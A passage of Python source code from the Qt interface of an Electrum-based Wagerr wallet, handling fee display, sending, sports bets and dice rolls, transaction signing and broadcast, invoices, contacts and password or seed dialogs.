self.not_enough_funds = True
elif isinstance(e, NoDynamicFeeEstimates):
try:
tx = make_tx(0)
size = tx.estimated_size()
self.size_e.setAmount(size)
except BaseException:
pass
return
except BaseException:
self.logger.exception('')
return
size = tx.estimated_size()
self.size_e.setAmount(size)
fee = tx.get_fee()
fee = None if self.not_enough_funds else fee
# Displayed fee/fee_rate values are set according to user input.
# Due to rounding or dropping dust in CoinChooser,
# actual fees often differ somewhat.
if freeze_feerate or self.fee_slider.is_active():
displayed_feerate = self.feerate_e.get_amount()
if displayed_feerate is not None:
displayed_feerate = quantize_feerate(displayed_feerate)
else:
# fallback to actual fee
displayed_feerate = quantize_feerate(fee / size) if fee is not None else None
self.feerate_e.setAmount(displayed_feerate)
displayed_fee = round(displayed_feerate * size) if displayed_feerate is not None else None
self.fee_e.setAmount(displayed_fee)
else:
if freeze_fee:
displayed_fee = self.fee_e.get_amount()
else:
# fallback to actual fee if nothing is frozen
displayed_fee = fee
self.fee_e.setAmount(displayed_fee)
displayed_fee = displayed_fee if displayed_fee else 0
displayed_feerate = quantize_feerate(displayed_fee / size) if displayed_fee is not None else None
self.feerate_e.setAmount(displayed_feerate)
# show/hide fee rounding icon
feerounding = (fee - displayed_fee) if fee else 0
self.set_feerounding_text(int(feerounding))
self.feerounding_icon.setToolTip(self.feerounding_text)
self.feerounding_icon.setVisible(abs(feerounding) >= 1)
if self.max_button.isChecked():
amount = tx.output_value()
__, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
amount_after_all_fees = amount - x_fee_amount
self.amount_e.setAmount(amount_after_all_fees)
def from_list_delete(self, item):
i = self.from_list.indexOfTopLevelItem(item)
self.pay_from.pop(i)
self.redraw_from_list()
self.update_fee()
def from_list_menu(self, position):
item = self.from_list.itemAt(position)
menu = QMenu()
menu.addAction(_("Remove"), lambda: self.from_list_delete(item))
menu.exec_(self.from_list.viewport().mapToGlobal(position))
def set_pay_from(self, coins):
self.pay_from = list(coins)
self.redraw_from_list()
def redraw_from_list(self):
self.from_list.clear()
self.from_label.setHidden(len(self.pay_from) == 0)
self.from_list.setHidden(len(self.pay_from) == 0)
def format(x):
h = x.get('prevout_hash')
return h[0:10] + '...' + h[-10:] + ":%d"%x.get('prevout_n') + u'\t' + "%s"%x.get('address')
for item in self.pay_from:
self.from_list.addTopLevelItem(QTreeWidgetItem( [format(item), self.format_amount(item['value']) ]))
def get_contact_payto(self, key):
_type, label = self.contacts.get(key)
return label + ' <' + key + '>' if _type == 'address' else key
def update_completions(self):
l = [self.get_contact_payto(key) for key in self.contacts.keys()]
self.completions.setStringList(l)
def protected(func):
'''Password request wrapper. The password is passed to the function
as the 'password' named argument. "None" indicates either an
unencrypted wallet, or the user cancelled the password request.
An empty input is passed as the empty string.'''
def request_password(self, *args, **kwargs):
parent = self.top_level_window()
self.password = None
while self.wallet.has_keystore_encryption():
if self.password == None:
self.password = self.password_dialog(parent=parent)
if self.password is None:
# User cancelled password input
return
try:
self.wallet.check_password(self.password)
break
except Exception as e:
self.show_error(str(e), parent=parent)
self.password = None
continue
kwargs['password'] = self.password
return func(self, *args, **kwargs)
return request_password
def is_send_fee_frozen(self):
return self.fee_e.isVisible() and self.fee_e.isModified() \
and (self.fee_e.text() or self.fee_e.hasFocus())
def is_send_feerate_frozen(self):
return self.feerate_e.isVisible() and self.feerate_e.isModified() \
and (self.feerate_e.text() or self.feerate_e.hasFocus())
def get_send_fee_estimator(self):
if self.is_send_fee_frozen():
fee_estimator = self.fee_e.get_amount()
elif self.is_send_feerate_frozen():
amount = self.feerate_e.get_amount() # sat/byte feerate
amount = 0 if amount is None else amount * 1000 # sat/kilobyte feerate
fee_estimator = partial(
simple_config.SimpleConfig.estimate_fee_for_feerate, amount)
else:
fee_estimator = None
return fee_estimator
def read_send_tab(self):
label = self.message_e.text()
if self.payment_request:
outputs = self.payment_request.get_outputs()
else:
outputs = self.payto_e.get_outputs(self.max_button.isChecked())
fee_estimator = self.get_send_fee_estimator()
coins = self.get_coins()
return outputs, fee_estimator, label, coins
def read_bet_tab(self,a):
label = None
legs = []
opCode=''
if hasattr(a, 'legs'):
for l in a.legs:
legs.append(l)
isParlayPeerlessBet, opCode = PeerlessBet.ParlayToOpCode(legs)
amount = int(a.editBettingAmount.get_amount())
if not(isParlayPeerlessBet):
raise Exception('Error converting Paylay PeerlessBets to opcode')
else:
eventId = int(a.eventIdToBetOn)
outcome = int(a.betOutcome)
amount = int(a.editBettingAmount.get_amount())
print("Event Id: ",eventId)
print("Outcome: ",outcome)
print("Amount: ",amount)
pb = PeerlessBet(eventId, outcome)
isPeerlessBet,opCode=PeerlessBet.ToOpCode(pb)
if not(isPeerlessBet) :
raise Exception('Error converting PeerlessBet to opcode')
print('OpCode:',opCode)
outputs = [TxOutput(bitcoin.TYPE_BET, opCode, amount)]
fee_estimator = self.get_send_fee_estimator()
coins = self.get_coins()
return outputs, fee_estimator, label, coins
def read_dice_tab(self, d):
label = None
isDice, opCode = ChainGame.DiceToOpCode(d)
amount = int(d.amount)
if not(isDice):
raise Exception('Error converting Dice to opcode')
print('OpCode:',opCode)
outputs = [TxOutput(bitcoin.TYPE_QUICKGAME, opCode, amount)]
fee_estimator = self.get_send_fee_estimator()
coins = self.get_coins()
return outputs, fee_estimator, label, coins
def check_send_tab_outputs_and_show_errors(self, outputs) -> bool:
"""Returns whether there are errors with outputs.
Also shows error dialog to user if so.
"""
pr = self.payment_request
if pr:
if pr.has_expired():
self.show_error(_('Payment request has expired'))
return True
if not pr:
errors = self.payto_e.get_errors()
if errors:
self.show_warning(_("Invalid Lines found:") + "\n\n" + '\n'.join([ _("Line #") + str(x[0]+1) + ": " + x[1] for x in errors]))
return True
if self.payto_e.is_alias and self.payto_e.validated is False:
alias = self.payto_e.toPlainText()
msg = _('WARNING: the alias "{}" could not be validated via an additional '
'security check, DNSSEC, and thus may not be correct.').format(alias) + '\n'
msg += _('Do you wish to continue?')
if not self.question(msg):
return True
if not outputs:
self.show_error(_('No outputs'))
return True
for o in outputs:
if o.address is None:
self.show_error(_('Wagerr Address is None'))
return True
if o.type == TYPE_ADDRESS and not bitcoin.is_address(o.address):
self.show_error(_('Invalid Wagerr Address'))
return True
if o.value is None:
self.show_error(_('Invalid Amount'))
return True
return False # no errors
def do_preview(self):
self.do_send(preview = True)
def do_roll(self,d, bettype , preview = False):
#print('do_roll called')
if run_hook('abort_roll', self):
return
args = {"type": bettype}
outputs, fee_estimator, tx_desc, coins = self.read_dice_tab(d)
if self.check_send_tab_outputs_and_show_errors(outputs):
return
try:
is_sweep = bool(self.tx_external_keypairs)
#print('do_roll calling make_unsigned_transaction')
tx = self.wallet.make_unsigned_transaction(
coins, outputs, self.config, fixed_fee=fee_estimator,
is_sweep=is_sweep)
#print('do_roll calling make_unsigned_transaction done')
except (NotEnoughFunds, NoDynamicFeeEstimates) as e:
self.show_message(str(e))
return
except InternalAddressCorruption as e:
self.show_error(str(e))
raise
except BaseException as e:
self.logger.exception('')
self.show_message(str(e))
return
amount = tx.output_value() if self.max_button.isChecked() else sum(map(lambda x:x[2], outputs))
fee = tx.get_fee()
use_rbf = self.config.get('use_rbf', True)
if use_rbf:
tx.set_rbf(True)
if fee < self.wallet.relayfee() * tx.estimated_size() / 1000:
self.show_error('\n'.join([
_("This transaction requires a higher fee, or it will not be propagated by your current server"),
_("Try to raise your transaction fee, or use a server with a lower relay fee.")
]))
return
if preview:
self.show_transaction(tx, tx_desc)
return
if not self.network:
self.show_error(_("You can't broadcast a transaction without a live network connection."))
return
# confirmation dialog
msg = [
_("Amount to be sent") + ": " + self.format_amount_and_units(amount),
_("Mining fee") + ": " + self.format_amount_and_units(fee),
]
x_fee = run_hook('get_tx_extra_fee', self.wallet, tx)
if x_fee:
x_fee_address, x_fee_amount = x_fee
msg.append( _("Additional fees") + ": " + self.format_amount_and_units(x_fee_amount) )
feerate_warning = simple_config.FEERATE_WARNING_HIGH_FEE
if fee > feerate_warning * tx.estimated_size() / 1000:
msg.append(_('Warning') + ': ' + _("The fee for this transaction seems unusually high."))
if self.wallet.has_keystore_encryption():
msg.append("")
msg.append(_("Enter your password to proceed"))
if self.password == None:
self.password = self.password_dialog('\n'.join(msg))
if not self.password:
return
else:
msg.append(_('Proceed?'))
self.password = None
if not self.question('\n'.join(msg)):
return
def sign_done(success):
if success:
if not tx.is_complete():
self.show_transaction(tx)
self.do_clear()
else:
print('do_roll sign_done else')
self.broadcast_transaction(tx, tx_desc, args )
print('do_roll calling sign_tx_with_password')
self.sign_tx_with_password(tx, sign_done, self.password)
def do_bet(self,a , bettype ,preview = False):
#print('do_bet called')
args = {"type": bettype , "listitem": a }
if run_hook('abort_bet', self):
return
outputs, fee_estimator, tx_desc, coins = self.read_bet_tab(a)
if self.check_send_tab_outputs_and_show_errors(outputs):
return
try:
is_sweep = bool(self.tx_external_keypairs)
#print('do_bet calling make_unsigned_transaction')
tx = self.wallet.make_unsigned_transaction(
coins, outputs, self.config, fixed_fee=fee_estimator,
is_sweep=is_sweep)
#print('do_bet calling make_unsigned_transaction done')
except (NotEnoughFunds, NoDynamicFeeEstimates) as e:
self.show_message(str(e))
return
except InternalAddressCorruption as e:
self.show_error(str(e))
raise
except BaseException as e:
self.logger.exception('')
self.show_message(str(e))
return
amount = tx.output_value() if self.max_button.isChecked() else sum(map(lambda x:x[2], outputs))
fee = tx.get_fee()
use_rbf = self.config.get('use_rbf', True)
if use_rbf:
tx.set_rbf(True)
if fee < self.wallet.relayfee() * tx.estimated_size() / 1000:
self.show_error('\n'.join([
_("This transaction requires a higher fee, or it will not be propagated by your current server"),
_("Try to raise your transaction fee, or use a server with a lower relay fee.")
]))
return
if preview:
self.show_transaction(tx, tx_desc)
return
if not self.network:
self.show_error(_("You can't broadcast a transaction without a live network connection."))
return
# confirmation dialog
msg = [
_("Amount to be sent") + ": " + self.format_amount_and_units(amount),
_("Mining fee") + ": " + self.format_amount_and_units(fee),
]
x_fee = run_hook('get_tx_extra_fee', self.wallet, tx)
if x_fee:
x_fee_address, x_fee_amount = x_fee
msg.append( _("Additional fees") + ": " + self.format_amount_and_units(x_fee_amount) )
feerate_warning = simple_config.FEERATE_WARNING_HIGH_FEE
if fee > feerate_warning * tx.estimated_size() / 1000:
msg.append(_('Warning') + ': ' + _("The fee for this transaction seems unusually high."))
if self.wallet.has_keystore_encryption():
msg.append("")
msg.append(_("Enter your password to proceed"))
if self.password == None:
self.password = self.password_dialog('\n'.join(msg))
if not self.password:
return
else:
msg.append(_('Proceed?'))
self.password = None
if not self.question('\n'.join(msg)):
return
def sign_done(success):
if success:
if not tx.is_complete():
self.show_transaction(tx)
self.do_clear()
else:
print('do_bet sign_done else')
self.broadcast_transaction(tx, tx_desc,args)
print('do_bet calling sign_tx_with_password')
self.sign_tx_with_password(tx, sign_done, self.password)
def do_send(self, preview = False):
print('do_send called')
if run_hook('abort_send', self):
return
outputs, fee_estimator, tx_desc, coins = self.read_send_tab()
if self.check_send_tab_outputs_and_show_errors(outputs):
return
try:
is_sweep = bool(self.tx_external_keypairs)
print('calling make_unsigned_transaction')
tx = self.wallet.make_unsigned_transaction(
coins, outputs, self.config, fixed_fee=fee_estimator,
is_sweep=is_sweep)
print('calling make_unsigned_transaction done')
except (NotEnoughFunds, NoDynamicFeeEstimates) as e:
self.show_message(str(e))
return
except InternalAddressCorruption as e:
self.show_error(str(e))
raise
except BaseException as e:
self.logger.exception('')
self.show_message(str(e))
return
amount = tx.output_value() if self.max_button.isChecked() else sum(map(lambda x:x[2], outputs))
fee = tx.get_fee()
use_rbf = self.config.get('use_rbf', True)
if use_rbf:
tx.set_rbf(True)
if fee < self.wallet.relayfee() * tx.estimated_size() / 1000:
self.show_error('\n'.join([
_("This transaction requires a higher fee, or it will not be propagated by your current server"),
_("Try to raise your transaction fee, or use a server with a lower relay fee.")
]))
return
if preview:
self.show_transaction(tx, tx_desc)
return
if not self.network:
self.show_error(_("You can't broadcast a transaction without a live network connection."))
return
# confirmation dialog
msg = [
_("Amount to be sent") + ": " + self.format_amount_and_units(amount),
_("Mining fee") + ": " + self.format_amount_and_units(fee),
]
x_fee = run_hook('get_tx_extra_fee', self.wallet, tx)
if x_fee:
x_fee_address, x_fee_amount = x_fee
msg.append( _("Additional fees") + ": " + self.format_amount_and_units(x_fee_amount) )
feerate_warning = simple_config.FEERATE_WARNING_HIGH_FEE
if fee > feerate_warning * tx.estimated_size() / 1000:
msg.append(_('Warning') + ': ' + _("The fee for this transaction seems unusually high."))
if self.wallet.has_keystore_encryption():
msg.append("")
msg.append(_("Enter your password to proceed"))
if self.password == None:
self.password = self.password_dialog('\n'.join(msg))
if not self.password:
return
else:
msg.append(_('Proceed?'))
self.password = None
if not self.question('\n'.join(msg)):
return
def sign_done(success):
if success:
if not tx.is_complete():
self.show_transaction(tx)
self.do_clear()
else:
print('sign_done else')
self.broadcast_transaction(tx, tx_desc)
print('calling sign_tx_with_password')
self.sign_tx_with_password(tx, sign_done, self.password)
@protected
def sign_tx(self, tx, callback, password):
self.sign_tx_with_password(tx, callback, password)
def sign_tx_with_password(self, tx, callback, password):
'''Sign the transaction in a separate thread. When done, calls
the callback with a success code of True or False.
'''
def on_success(result):
callback(True)
def on_failure(exc_info):
self.on_error(exc_info)
self.password = None
callback(False)
on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
if self.tx_external_keypairs:
# can sign directly
task = partial(Transaction.sign, tx, self.tx_external_keypairs)
else:
task = partial(self.wallet.sign_transaction, tx, password)
msg = _('Signing transaction...')
WaitingDialog(self, msg, task, on_success, on_failure)
def broadcast_transaction(self, tx, tx_desc,args = None):
print('broadcast_transaction')
def broadcast_thread():
# non-GUI thread
pr = self.payment_request
if pr and pr.has_expired():
self.payment_request = None
return False, _("Payment request has expired")
status = False
try:
self.network.run_from_another_thread(self.network.broadcast_transaction(tx))
except TxBroadcastError as e:
msg = e.get_message_for_gui()
except BestEffortRequestFailed as e:
msg = repr(e)
else:
status, msg = True, tx.txid()
if pr and status is True:
self.invoices.set_paid(pr, tx.txid())
self.invoices.save()
self.payment_request = None
refund_address = self.wallet.get_receiving_address()
coro = pr.send_payment_and_receive_paymentack(str(tx), refund_address)
fut = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop)
ack_status, ack_msg = fut.result(timeout=20)
asyncio.sleep(3)
self.logger.info(f"Payment ACK: {ack_status}. Ack message: {ack_msg}")
return status, msg
# Capture current TL window; override might be removed on return
parent = self.top_level_window(lambda win: isinstance(win, MessageBoxMixin))
def broadcast_done(result):
# GUI thread
if result:
status, msg = result
if status:
if tx_desc is not None and tx.is_complete():
self.wallet.set_label(tx.txid(), tx_desc)
parent.show_message(_('Payment sent.') + '\n' + msg)
self.invoice_list.update()
Event.getInstance().trigger_callback("tx_brodcasted",args)
self.do_clear()
else:
msg = msg or ''
parent.show_error(msg)
WaitingDialog(self, _('Broadcasting transaction...'),
broadcast_thread, broadcast_done, self.on_error)
def query_choice(self, msg, choices):
# Needed by QtHandler for hardware wallets
dialog = WindowModalDialog(self.top_level_window())
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout(dialog)
vbox.addLayout(clayout.layout())
vbox.addLayout(Buttons(OkButton(dialog)))
if not dialog.exec_():
return None
return clayout.selected_index()
def lock_amount(self, b):
self.amount_e.setFrozen(b)
self.max_button.setEnabled(not b)
def prepare_for_payment_request(self):
self.show_send_tab()
self.payto_e.is_pr = True
for e in [self.payto_e, self.message_e]:
e.setFrozen(True)
self.lock_amount(True)
self.payto_e.setText(_("please wait..."))
return True
def delete_invoice(self, key):
self.invoices.remove(key)
self.invoice_list.update()
def payment_request_ok(self):
pr = self.payment_request
if not pr:
return
key = self.invoices.add(pr)
status = self.invoices.get_status(key)
self.invoice_list.update()
if status == PR_PAID:
self.show_message("invoice already paid")
self.do_clear()
self.payment_request = None
return
self.payto_e.is_pr = True
if not pr.has_expired():
self.payto_e.setGreen()
else:
self.payto_e.setExpired()
self.payto_e.setText(pr.get_requestor())
self.amount_e.setText(format_satoshis_plain(pr.get_amount(), self.decimal_point))
self.message_e.setText(pr.get_memo())
# signal to set fee
self.amount_e.textEdited.emit("")
def payment_request_error(self):
pr = self.payment_request
if not pr:
return
self.show_message(pr.error)
self.payment_request = None
self.do_clear()
def on_pr(self, request):
self.payment_request = request
if self.payment_request.verify(self.contacts):
self.payment_request_ok_signal.emit()
else:
self.payment_request_error_signal.emit()
def pay_to_URI(self, URI):
if not URI:
return
try:
out = util.parse_URI(URI, self.on_pr)
except InvalidBitcoinURI as e:
#self.show_error(_("Error parsing URI") + f":\n{e}") #uncomment this later
return
self.show_send_tab()
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if r or (name and sig):
self.prepare_for_payment_request()
return
address = out.get('address')
amount = out.get('amount')
label = out.get('label')
message = out.get('message')
# use label as description (not BIP21 compliant)
if label and not message:
message = label
if address:
self.payto_e.setText(address)
if message:
self.message_e.setText(message)
if amount:
self.amount_e.setAmount(amount)
self.amount_e.textEdited.emit("")
def do_clear(self):
self.max_button.setChecked(False)
self.not_enough_funds = False
self.payment_request = None
self.payto_e.is_pr = False
for e in [self.payto_e, self.message_e, self.amount_e, self.fiat_send_e,
self.fee_e, self.feerate_e]:
e.setText('')
e.setFrozen(False)
#self.eventid_e.is_pr = False
# for e in [self.eventid_e, self.outcome_e, self.betting_amount_e]:
# e.setText('')
# e.setFrozen(False)
self.fee_slider.activate()
self.feerate_e.setAmount(self.config.fee_per_byte())
self.size_e.setAmount(0)
self.feerounding_icon.setVisible(False)
self.set_pay_from([])
self.tx_external_keypairs = {}
self.update_status()
run_hook('do_clear', self)
def set_frozen_state_of_addresses(self, addrs, freeze: bool):
self.wallet.set_frozen_state_of_addresses(addrs, freeze)
self.address_list.update()
self.utxo_list.update()
self.update_fee()
def set_frozen_state_of_coins(self, utxos, freeze: bool):
self.wallet.set_frozen_state_of_coins(utxos, freeze)
self.utxo_list.update()
self.update_fee()
def create_list_tab(self, l, toolbar=None):
w = QWidget()
w.searchable_list = l
vbox = QVBoxLayout()
w.setLayout(vbox)
vbox.setContentsMargins(0, 0, 0, 0)
vbox.setSpacing(0)
if toolbar:
vbox.addLayout(toolbar)
vbox.addWidget(l)
return w
def create_addresses_tab(self):
from .address_list import AddressList
self.address_list = l = AddressList(self)
toolbar = l.create_toolbar(self.config)
toolbar_shown = self.config.get('show_toolbar_addresses', False)
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def create_utxo_tab(self):
from .utxo_list import UTXOList
self.utxo_list = l = UTXOList(self)
return self.create_list_tab(l)
def create_contacts_tab(self):
from .contact_list import ContactList
self.contact_list = l = ContactList(self)
return self.create_list_tab(l)
def remove_address(self, addr):
if self.question(_("Do you want to remove {} from your wallet?").format(addr)):
self.wallet.delete_address(addr)
self.need_update.set() # history, addresses, coins
self.clear_receive_tab()
def get_coins(self):
if self.pay_from:
return self.pay_from
else:
return self.wallet.get_spendable_coins(None, self.config)
def spend_coins(self, coins):
self.set_pay_from(coins)
self.show_send_tab()
self.update_fee()
def paytomany(self):
self.show_send_tab()
self.payto_e.paytomany()
msg = '\n'.join([
_('Enter a list of outputs in the \'Pay to\' field.'),
_('One output per line.'),
_('Format: address, amount'),
_('You may load a CSV file using the file icon.')
])
self.show_message(msg, title=_('Pay to many'))
def payto_contacts(self, labels):
paytos = [self.get_contact_payto(label) for label in labels]
self.show_send_tab()
if len(paytos) == 1:
self.payto_e.setText(paytos[0])
self.amount_e.setFocus()
else:
text = "\n".join([payto + ", 0" for payto in paytos])
self.payto_e.setText(text)
self.payto_e.setFocus()
def set_contact(self, label, address):
if not is_address(address):
self.show_error(_('Invalid Address'))
self.contact_list.update() # Displays original unchanged value
return False
self.contacts[address] = ('address', label)
self.contact_list.update()
self.history_list.update()
self.betting_history_list.update()
self.dice_history_list.update()
self.update_completions()
return True
def delete_contacts(self, labels):
if not self.question(_("Remove {} from your list of contacts?")
.format(" + ".join(labels))):
return
for label in labels:
self.contacts.pop(label)
self.history_list.update()
self.betting_history_list.update()
self.dice_history_list.update()
self.contact_list.update()
self.update_completions()
def show_invoice(self, key):
pr = self.invoices.get(key)
if pr is None:
self.show_error('Cannot find payment request in wallet.')
return
pr.verify(self.contacts)
self.show_pr_details(pr)
def show_pr_details(self, pr):
key = pr.get_id()
d = WindowModalDialog(self, _("Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Requestor") + ':'), 0, 0)
grid.addWidget(QLabel(pr.get_requestor()), 0, 1)
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
outputs_str = '\n'.join(map(lambda x: self.format_amount(x[2])+ self.base_unit() + ' @ ' + x[1], pr.get_outputs()))
grid.addWidget(QLabel(outputs_str), 1, 1)
expires = pr.get_expiration_date()
grid.addWidget(QLabel(_("Memo") + ':'), 2, 0)
grid.addWidget(QLabel(pr.get_memo()), 2, 1)
grid.addWidget(QLabel(_("Signature") + ':'), 3, 0)
grid.addWidget(QLabel(pr.get_verify_status()), 3, 1)
if expires:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(expires)), 4, 1)
vbox.addLayout(grid)
def do_export():
name = str(key) + '.bip70'
fn = self.getSaveFileName(_("Save invoice to file"), name, filter="*.bip70")
if not fn:
return
with open(fn, 'wb') as f:
data = f.write(pr.raw)
self.show_message(_('Invoice saved as' + ' ' + fn))
exportButton = EnterButton(_('Save'), do_export)
def do_delete():
if self.question(_('Delete invoice?')):
self.invoices.remove(key)
self.history_list.update()
self.betting_history_list.update()
self.dice_history_list.update()
self.invoice_list.update()
d.close()
deleteButton = EnterButton(_('Delete'), do_delete)
vbox.addLayout(Buttons(exportButton, deleteButton, CloseButton(d)))
d.exec_()
def do_pay_invoice(self, key):
pr = self.invoices.get(key)
self.payment_request = pr
self.prepare_for_payment_request()
pr.error = None # this forces verify() to re-run
if pr.verify(self.contacts):
self.payment_request_ok()
else:
self.payment_request_error()
def create_console_tab(self):
from .console import Console
self.console = console = Console()
return console
def update_console(self):
console = self.console
console.history = self.config.get("console-history",[])
console.history_index = len(console.history)
console.updateNamespace({
'wallet': self.wallet,
'network': self.network,
'plugins': self.gui_object.plugins,
'window': self,
'config': self.config,
'electrum': electrum,
'daemon': self.gui_object.daemon,
'util': util,
'bitcoin': bitcoin,
})
c = commands.Commands(self.config, self.wallet, self.network, lambda: self.console.set_json(True))
methods = {}
def mkfunc(f, method):
return lambda *args: f(method, args, self.password_dialog)
for m in dir(c):
if m[0]=='_' or m in ['network','wallet','config']: continue
methods[m] = mkfunc(c._run, m)
console.updateNamespace(methods)
def create_status_bar(self):
sb = QStatusBar()
sb.setFixedHeight(35)
self.balance_label = QLabel("Loading wallet...")
self.balance_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
self.balance_label.setStyleSheet("""QLabel { padding: 0 }""")
sb.addWidget(self.balance_label)
self.blockchain_status = QLabel("Height:")
self.blockchain_status.setStyleSheet("QLabel { font-weight:bold }")
sb.addPermanentWidget(self.blockchain_status)
self.search_box = QLineEdit()
self.search_box.textChanged.connect(self.do_search)
self.search_box.hide()
sb.addPermanentWidget(self.search_box)
self.update_check_button = QPushButton("")
self.update_check_button.setFlat(True)
self.update_check_button.setCursor(QCursor(Qt.PointingHandCursor))
self.update_check_button.setIcon(read_QIcon("update.png"))
self.update_check_button.hide()
sb.addPermanentWidget(self.update_check_button)
self.password_button = StatusBarButton(QIcon(), _("Password"), self.change_password_dialog )
sb.addPermanentWidget(self.password_button)
sb.addPermanentWidget(StatusBarButton(read_QIcon("preferences.png"), _("Preferences"), self.settings_dialog ) )
self.seed_button = StatusBarButton(read_QIcon("seed.png"), _("Seed"), self.show_seed_dialog )
sb.addPermanentWidget(self.seed_button)
self.status_button = StatusBarButton(read_QIcon("status_disconnected.png"), _("Network"), lambda: self.gui_object.show_network_dialog(self))
sb.addPermanentWidget(self.status_button)
run_hook('create_status_bar', sb)
self.setStatusBar(sb)
def update_lock_icon(self):
icon = read_QIcon("lock.png") if self.wallet.has_password() else read_QIcon("unlock.png")
self.password_button.setIcon(icon)
def update_buttons_on_seed(self):
self.seed_button.setVisible(self.wallet.has_seed())
self.password_button.setVisible(self.wallet.may_have_password())
self.send_button.setVisible(not self.wallet.is_watching_only())
def change_password_dialog(self):
from electrum.storage import STO_EV_XPUB_PW
if self.wallet.get_available_storage_encryption_version() == STO_EV_XPUB_PW:
from .password_dialog import ChangePasswordDialogForHW
d = ChangePasswordDialogForHW(self, self.wallet)
ok, encrypt_file = d.run()
if not ok:
return
try:
hw_dev_pw = self.wallet.keystore.get_password_for_storage_encryption()
except UserCancelled:
return
except BaseException as e:
self.logger.exception('')
self.show_error(str(e))
return
old_password = hw_dev_pw if self.wallet.has_password() else None
new_password = hw_dev_pw if encrypt_file else None
else:
from .password_dialog import ChangePasswordDialogForSW
d = ChangePasswordDialogForSW(self, self.wallet)
ok, old_password, new_password, encrypt_file = d.run()
if not ok:
return
try:
self.wallet.update_password(old_password, new_password, encrypt_file)
except InvalidPassword as e:
self.show_error(str(e))
return
except BaseException:
self.logger.exception('Failed to update password')
self.show_error(_('Failed to update password'))
return
msg = _('Password was updated successfully') if self.wallet.has_password() else _('Password is disabled, this wallet is not protected')
self.show_message(msg, title=_("Success"))
self.update_lock_icon()
def toggle_search(self):
tab = self.tabs.currentWidget()
#if hasattr(tab, 'searchable_list'):
# tab.searchable_list.toggle_toolbar()
#return
self.search_box.setHidden(not self.search_box.isHidden())
if not self.search_box.isHidden():
self.search_box.setFocus(1)
else:
self.do_search('')
def do_search(self, t):
tab = self.tabs.currentWidget()
if hasattr(tab, 'searchable_list'):
tab.searchable_list.filter(t)
def new_contact_dialog(self):
d = WindowModalDialog(self, _("New Contact"))
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_('New Contact') + ':'))
grid = QGridLayout()
line1 = QLineEdit()
line1.setFixedWidth(32 * char_width_in_lineedit())
line2 = QLineEdit()
line2.setFixedWidth(32 * char_width_in_lineedit())
grid.addWidget(QLabel(_("Address")), 1, 0)
grid.addWidget(line1, 1, 1)
grid.addWidget(QLabel(_("Name")), 2, 0)
grid.addWidget(line2, 2, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if d.exec_():
self.set_contact(line2.text(), line1.text())
def show_master_public_keys(self):
dialog = WindowModalDialog(self, _("Wallet Information"))
dialog.setMinimumSize(500, 100)
mpk_list = self.wallet.get_master_public_keys()
vbox = QVBoxLayout()
wallet_type = self.wallet.storage.get('wallet_type', '')
if self.wallet.is_watching_only():
wallet_type += ' [{}]'.format(_('watching-only'))
seed_available = _('True') if self.wallet.has_seed() else _('False')
keystore_types = [k.get_type_text() for k in self.wallet.get_keystores()]
grid = QGridLayout()
basename = os.path.basename(self.wallet.storage.path)
grid.addWidget(QLabel(_("Wallet name")+ ':'), 0, 0)
grid.addWidget(QLabel(basename), 0, 1)
grid.addWidget(QLabel(_("Wallet type")+ ':'), 1, 0)
grid.addWidget(QLabel(wallet_type), 1, 1)
grid.addWidget(QLabel(_("Script type")+ ':'), 2, 0)
grid.addWidget(QLabel(self.wallet.txin_type), 2, 1)
grid.addWidget(QLabel(_("Seed available") + ':'), 3, 0)
grid.addWidget(QLabel(str(seed_available)), 3, 1)
if len(keystore_types) <= 1:
grid.addWidget(QLabel(_("Keystore type") + ':'), 4, 0)
ks_type = str(keystore_types[0]) if keystore_types else _('No keystore')
grid.addWidget(QLabel(ks_type), 4, 1)
vbox.addLayout(grid)
if self.wallet.is_deterministic():
mpk_text = ShowQRTextEdit()
mpk_text.setMaximumHeight(150)
mpk_text.addCopyButton(self.app)
def show_mpk(index):
mpk_text.setText(mpk_list[index])
mpk_text.repaint() # macOS hack for #4777
# only show the combobox in case multiple accounts are available
if len(mpk_list) > 1:
def label(key):
if isinstance(self.wallet, Multisig_Wallet):
return _("cosigner") + f' {key+1} ( keystore: {keystore_types[key]} )'
return ''
labels = [label(i) for i in range(len(mpk_list))]
on_click = lambda clayout: show_mpk(clayout.selected_index())
labels_clayout = ChoicesLayout(_("Master Public Keys"), labels, on_click)
vbox.addLayout(labels_clayout.layout())
else:
vbox.addWidget(QLabel(_("Master Public Key")))
show_mpk(0)
vbox.addWidget(mpk_text)
vbox.addStretch(1)
vbox.addLayout(Buttons(CloseButton(dialog)))
dialog.setLayout(vbox)
dialog.exec_()
def remove_wallet(self):
if self.question('\n'.join([
_('Delete wallet file?'),
"%s"%self.wallet.storage.path,
_('If your wallet contains funds, make sure you have saved its seed.')])):
self._delete_wallet()
@protected
def _delete_wallet(self, password):
wallet_path = self.wallet.storage.path
basename = os.path.basename(wallet_path)
r = self.gui_object.daemon.delete_wallet(wallet_path)
self.close()
if r:
self.show_error(_("Wallet removed: {}").format(basename))
else:
self.show_error(_("Wallet file not found: {}").format(basename))
@protected
def show_seed_dialog(self, password):
if not self.wallet.has_seed():
self.show_message(_('This wallet has no seed'))
return
keystore = self.wallet.get_keystore()
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except BaseException as e:
self.show_error(str(e))
return
from .seed_dialog import SeedDialog
d = SeedDialog(self, seed, passphrase)
d.exec_()
def show_qrcode(self, data, title = _("QR code"), parent=None):
if not data:
return
d = QRDialog(data, parent or self, title)
d.exec_()
@protected
def show_private_key(self, address, password):
if not address:
return
try:
pk, redeem_script = self.wallet.export_private_key(address, password)
except Exception as e:
self.logger.exception('')
self.show_message(str(e))
return
xtype = bitcoin.deserialize_privkey(pk)[0]
d = WindowModalDialog(self, _("Private key"))
d.setMinimumSize(600, 150)
vbox = QVBoxLayout()
